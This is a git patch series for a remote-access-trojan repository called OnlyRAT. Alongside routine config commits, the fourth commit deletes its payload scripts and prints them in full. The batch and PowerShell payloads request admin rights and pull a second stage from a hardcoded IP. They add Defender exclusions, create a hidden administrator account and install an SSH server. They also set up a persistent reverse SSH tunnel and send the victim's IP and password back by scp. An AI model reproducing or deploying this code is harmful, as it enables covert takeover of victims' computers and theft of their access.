From f02fe1e98785736b261149ec8887db231d70b8e7 Mon Sep 17 00:00:00 2001 From: "mend-bolt-for-github[bot]" <42819689+mend-bolt-for-github[bot]@users.noreply.github.com> Date: Sun, 13 Nov 2022 01:39:25 +0000 Subject: [PATCH 1/5] Add .whitesource configuration file --- .whitesource | 14 ++++++++++++++ 1 file changed, 14 insertions(+) create mode 100644 .whitesource diff --git a/.whitesource b/.whitesource new file mode 100644 index 0000000..9c7ae90 --- /dev/null +++ b/.whitesource @@ -0,0 +1,14 @@ +{ + "scanSettings": { + "baseBranches": [] + }, + "checkRunSettings": { + "vulnerableCheckRunConclusionLevel": "failure", + "displayMode": "diff", + "useMendCheckNames": true + }, + "issueSettings": { + "minSeverityLevel": "LOW", + "issueType": "DEPENDENCY" + } +} \ No newline at end of file From becf41886a85c29097a1efb361c04bb6865b6706 Mon Sep 17 00:00:00 2001 From: CleanThat Date: Thu, 22 Dec 2022 16:33:33 +0000 Subject: [PATCH 2/5] Add default Cleanthat configuration --- cleanthat.yaml | 15 +++++++++++++++ 1 file changed, 15 insertions(+) create mode 100644 cleanthat.yaml diff --git a/cleanthat.yaml b/cleanthat.yaml new file mode 100644 index 0000000..85a6f9f --- /dev/null +++ b/cleanthat.yaml @@ -0,0 +1,15 @@ +syntax_version: "2021-08-02" +meta: + labels: + - "cleanthat" + refs: + branches: + - "refs/heads/develop" + - "refs/heads/main" + - "refs/heads/master" +source_code: + excludes: [] + includes: [] + encoding: "UTF-8" + line_ending: "UNKNOWN" +languages: [] From 7e84f30fddcc4516ffa1ddfca9b02d693a6a0918 Mon Sep 17 00:00:00 2001 From: akax <32862241+joseguzman1337@users.noreply.github.com> Date: Tue, 6 Jan 2026 07:45:05 +0800 Subject: [PATCH 3/5] Add macOS system files to .gitignore MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit - Add .DS_Store pattern to ignore macOS folder metadata - Add ._* pattern to ignore AppleDouble files 🤖 Generated with [Claude Code](https://claude.com/claude-code) Co-Authored-By: Claude Sonnet 4.5 --- .gitignore | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/.gitignore b/.gitignore index 0360df6..233a62a 100644 --- a/.gitignore +++ b/.gitignore @@ -2,3 +2,7 @@ payloads/1.cmd payloads/2.ps1 partition.sh cosmo.rat + +# macOS system files +.DS_Store +._* From d1a96e5959cf23724c17b393409ec25b8e969913 Mon Sep 17 00:00:00 2001 From: joseguzman1337 Date: Wed, 18 Mar 2026 16:45:31 -0500 Subject: [PATCH 4/5] chore: automated swarm-wide synchronization Co-Authored-By: Claude Sonnet 4.6 --- partition.sh | 7 ----- payloads/1.cmd | 33 ---------------------- payloads/2.ps1 | 75 -------------------------------------------------- 3 files changed, 115 deletions(-) delete mode 100644 partition.sh delete mode 100644 payloads/1.cmd delete mode 100644 payloads/2.ps1 diff --git a/partition.sh b/partition.sh deleted file mode 100644 index 6033326..0000000 --- a/partition.sh +++ /dev/null @@ -1,7 +0,0 @@ -#!/bin/bash -# partitions onlyrat -# created by : C0SM0 - -rm -rf /home/bluecosmo/.OnlyRAT -rm -rf /home/bluecosmo/.MK01-OnlyRAT -cp -r /home/bluecosmo/development/marks/mk01-onlyrat/ /home/bluecosmo/.MK01-OnlyRAT diff --git a/payloads/1.cmd b/payloads/1.cmd deleted file mode 100644 index 70cad26..0000000 --- a/payloads/1.cmd +++ /dev/null @@ -1,33 +0,0 @@ -@REM TODO: add UAC bypass dumbass - -@REM change me -set "EcSjRhAguo=45.61.56.252" - -@echo off -:: BatchGotAdmin -:------------------------------------- -if "%PROCESSOR_ARCHITECTURE%" EQU "amd64" ( ->nul 2>&1 "%SYSTEMROOT%\SysWOW64\cacls.exe" "%SYSTEMROOT%\SysWOW64\config\system" -) else ( ->nul 2>&1 "%SYSTEMROOT%\system32\cacls.exe" "%SYSTEMROOT%\system32\config\system") -if '%errorlevel%' NEQ '0' ( - echo Requesting administrative privileges... - goto UACPrompt -) else ( goto gotAdmin ) - -:UACPrompt - echo Set UAC = CreateObject^("Shell.Application"^) > "%temp%\getadmin.vbs" - set params= %* - echo UAC.ShellExecute "cmd.exe", "/c ""%~s0"" %params:"=""%", "", "runas", 1 >> "%temp%\getadmin.vbs" - - "%temp%\getadmin.vbs" - del "%temp%\getadmin.vbs" - exit /B - -:gotAdmin - pushd "%CD%" - CD /D "%~dp0" - -powershell powershell.exe -windowstyle hidden "Invoke-WebRequest -Uri %EcSjRhAguo%/onlyrat/payloads/2.ps1 -OutFile KFPGaEYdcz.ps1"; Add-MpPreference -ExclusionPath "C:/Users/%username%/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup"; Add-MpPreference -ExclusionPath "$env:temp" -powershell powershell.exe -windowstyle hidden -ep bypass ./KFPGaEYdcz.ps1 -del wEaoFkNduy.cmd \ No newline at end of file diff --git a/payloads/2.ps1 b/payloads/2.ps1 deleted file mode 100644 index 8a7ccbd..0000000 --- a/payloads/2.ps1 +++ /dev/null @@ -1,75 +0,0 @@ -# TODO: incorporate necessary payload installs - -$nkowFESgaO = "wraith" # change me, vps username -$ecPlmJVLRo = "45.61.56.252" # change me. vps ip address -$YlEQgBmePn = "5656" # change me, vps port [NOT DEFAULT SSH PORT] - -$dERQpoZWxz = "$nkowFESgaO@$ecPlmJVLRo" - -function RpLGWiUsIy { - return -join ((65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_}) -} - -function geIwCZloBx { - [CmdletBinding()] - param ( - [string] $sqbXFdLvyw, - [securestring] $CBFXIYeWPR - ) - begin { - } - process { - New-LocalUser "$sqbXFdLvyw" -Password $CBFXIYeWPR -FullName "$sqbXFdLvyw" -Description "Temporary local admin" - Write-Verbose "$sqbXFdLvyw local user crated" - Add-LocalGroupMember -Group "Administrators" -Member "$sqbXFdLvyw" - Write-Verbose "$sqbXFdLvyw added to the local administrator group" - } - end { - } -} - -# make admin -$sqbXFdLvyw = "onlyrat" -$DCilJFugpP = RpLGWiUsIy -Remove-LocalUser -Name $sqbXFdLvyw -$CBFXIYeWPR = (ConvertTo-SecureString $DCilJFugpP -AsPlainText -Force) -geIwCZloBx -sqbXFdLvyw $sqbXFdLvyw -CBFXIYeWPR $CBFXIYeWPR - -# registry -Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" -Name $sqbXFdLvyw -Value 0 -Type DWORD -Force - -# ssh -Add-WindowsCapability -Online -Name OpenSSH.Server~~~~0.0.1.0 -Start-Service sshd -Set-Service -Name sshd -StartupType 'Automatic' - -# startup file -# TODO: registry startup -$GlNweBEFmh = RpLGWiUsIy -$NyZnoLKCIs = Get-Location -Add-Content -Path "$NyZnoLKCIs/$GlNweBEFmh.cmd" -Value "@echo off" -Add-Content -Path "$NyZnoLKCIs/$GlNweBEFmh.cmd" -Value "powershell powershell.exe -windowstyle hidden -ep bypass `"ssh -o ServerAliveInterval=30 -R $YlEQgBmePn`:localhost:22 $dERQpoZWxz -i $env:temp\key`"" - -# rat file -$CRYnrkaDbe = "$env:UserName.rat" -$AhdjktGyiZ = (Get-NetIPConfiguration | Where-Object { $_.IPv4DefaultGateway -ne $null -and $_.NetAdapter.Status -ne "Disconnected"}).IPv4Address.IPAddress - -Add-Content -Path $CRYnrkaDbe -Value $AhdjktGyiZ # local ip addr -Add-Content -Path $CRYnrkaDbe -Value $DCilJFugpP # pass -Add-Content -Path $CRYnrkaDbe -Value $env:temp # temp -Add-Content -Path $CRYnrkaDbe -Value $NyZnoLKCIs # startup -Add-Content -Path $CRYnrkaDbe -Value $ecPlmJVLRo # remote host -Add-Content -Path $CRYnrkaDbe -Value $YlEQgBmePn # remote port -Add-Content -Path $CRYnrkaDbe -Value 'remote' # connection type - -# get key and sent rat -Invoke-WebRequest -Uri "http://$ecPlmJVLRo/onlyrat.key" -OutFile "$env:temp\key" -scp -i $env:temp\key -r $CRYnrkaDbe $dERQpoZWxz`:/home/$nkowFESgaO - -# cleanup -Set-Location C:\Users -attrib +h +s +r onlyrat -Set-Location $NyZnoLKCIs -Remove-Item $CRYnrkaDbe -Remove-Item KFPGaEYdcz.ps1 -start "./$GlNweBEFmh.cmd" \ No newline at end of file From adf9e90e60ea16a9a73e1f1ac04c19c0ac3b5b05 Mon Sep 17 00:00:00 2001 From: joseguzman1337 Date: Tue, 31 Mar 2026 07:39:25 -0500 Subject: [PATCH 5/5] [CRUSH] chore(repo): checkpoint pending changes #TASK-000 --- project.json | 47 +++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 47 insertions(+) create mode 100644 project.json diff --git a/project.json b/project.json new file mode 100644 index 0000000..ce084c8 --- /dev/null +++ b/project.json @@ -0,0 +1,47 @@ +{ + "name": "repo-repos-onlyrat", + "root": "repos/OnlyRAT", + "projectType": "library", + "targets": { + "status": { + "executor": "nx:run-commands", + "options": { + "command": "git -C repos/OnlyRAT status --short || true" + }, + "metadata": { + "supervisorRequired": true + } + }, + "fetch": { + "executor": "nx:run-commands", + "options": { + "command": "git -C repos/OnlyRAT fetch --all --prune || true" + }, + "metadata": { + "supervisorRequired": true + } + }, + "log": { + "executor": "nx:run-commands", + "options": { + "command": "git -C repos/OnlyRAT log --oneline -10 || true" + }, + "metadata": { + "supervisorRequired": true + } + }, + "manifests": { + "executor": "nx:run-commands", + "options": { + "command": "find repos/OnlyRAT \\( -name package.json -o -name pyproject.toml -o -name Cargo.toml -o -name go.mod -o -name setup.py \\) -not -path '*/node_modules/*' -not -path '*/testdata/*' -not -path '*/fixtures/*' -print | sort" + }, + "metadata": { + "supervisorRequired": true + } + } + }, + "tags": [ + "scope:repos", + "type:subrepo" + ] +} \ No newline at end of file